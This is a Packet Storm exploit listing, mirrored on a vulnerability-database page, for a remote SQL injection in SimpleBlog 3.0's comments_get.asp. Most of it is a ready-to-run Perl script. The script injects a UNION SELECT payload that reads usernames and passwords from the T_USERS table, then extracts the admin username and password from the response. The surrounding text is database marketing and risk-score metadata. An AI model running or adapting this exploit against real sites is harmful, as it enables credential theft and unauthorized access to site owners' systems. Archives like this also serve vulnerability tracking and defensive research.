Lucene search
K

simpleblog-sql.txt

🗓️ 31 Jul 2007 00:00:00Reported by MurderSkillzType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

SimpleBlog 3.0 Remote SQL Injectio

Code
`#!/usr/bin/perl  
  
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#  
# SimpleBlog 3.0 [ comments_get.asp ] #  
# ] Remote SQL Injection [ #  
# #  
# [c]ode by TrinTiTTY [at] g00ns.net #  
# Vulnerability by MurderSkillz #  
# #  
# shoutz: z3r0, kat, str0ke, rezen, fish, wicked, clorox, #  
# Canuck, a59, sess, bernard, + the rest of g00ns #  
# [irc.g00ns.net] [www.g00ns.net] [ts.g00ns.net] #  
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#  
  
use LWP::UserAgent;  
  
$host = @ARGV[0];  
$ua = LWP::UserAgent->new;  
  
my $inject ='comments_get.asp?id=-99%20union%20all%20select%201,2,uUSERNAME,4,uPASSWORD,6,7,8,9%20from%20T_USERS';  
  
if (@ARGV < 1){&top( );&usage( )}  
elsif ($host =~ /http:\/\//){print"\n\n [-] Don't use http:// in host\n";exit( 0 );}  
else { &xpl( ) }  
sub xpl( ) {  
&top( );  
print "\n [~] Connecting\n";  
$res = $ua->get("http://$host/$inject");  
  
$con = $res->content;  
print "\n [~] Checking for admin info\n";  
if ($con =~ /<strong>([-_+.\w]{1,15})<\/strong>/gmi)  
{  
print "\n\t [+] Admin user: $1\n";  
}  
if ($con =~ /<a href\=\"http:\/\/(.*)\" target\=\"\_blank\">(.*)<\/a>/gmi)  
{  
print "\n\t [+] Admin password: $2\n";  
print "\n [+] Complete\n";  
}  
else {  
print "\n [-] Unable to retrieve admin info\n";  
exit(0);  
}  
}  
sub top( )  
{  
print q {  
##################################################################  
# SimpleBlog 3.0 [ comments_get.asp ] #  
# ] Remote SQL Injection [ #  
# #  
# [c]ode by TrinTiTTY [at] g00ns.net #  
# Vulnerability by MurderSkillz #  
##################################################################  
}  
}  
sub usage( )  
{  
print "\n Usage: perl simpleblog3.pl <host>\n";  
print "\n Example: perl simpleblog3.pl www.example.com/path\n\n";  
exit(0);  
}  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Jul 2007 00:00Current
7.4High risk
Vulners AI Score7.4
29